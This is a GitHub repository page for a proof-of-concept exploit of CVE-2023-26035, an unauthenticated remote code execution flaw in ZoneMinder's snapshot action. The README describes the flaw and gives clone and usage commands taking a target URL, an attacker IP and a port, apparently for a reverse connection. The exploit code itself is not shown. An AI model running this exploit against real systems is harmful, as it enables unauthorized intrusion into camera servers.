Skip to content
/ CVE-2023-26035 Public

Unauthenticated RCE in ZoneMinder Snapshots - Poc Exploit

18 stars 2 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

rvizx/CVE-2023-26035

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

7 Commits
README.md
README.md
 
 
exploit.py
exploit.py
 
 

Repository files navigation

CVE-2023-26035

Unauthenticated RCE in ZoneMinder Snapshots - PoC Exploit

alt img

Description

ZoneMinder versions prior to 1.36.33 and 1.37.33 are vulnerable to Unauthenticated Remote Code Execution due to missing authorization checks in the snapshot action.

Usage

git clone https://github.com/rvizx/CVE-2023-26035
cd CVE-2023-26035
python3 exploit.py

python3 exploit.py -t <target_url> -ip <attacker-ip> -p <port>

Requirements

pip3 install beautifulsoup4

Credits

UnblvR discovered the vulnerability.

About

Unauthenticated RCE in ZoneMinder Snapshots - Poc Exploit

Topics

exploit cve-2023-26035

Resources

Readme
Activity

Stars

18 stars

Watchers

1 watching

Forks

2 forks
Report repository

Releases

No releases published

Packages

No packages published

Contributors 2

Languages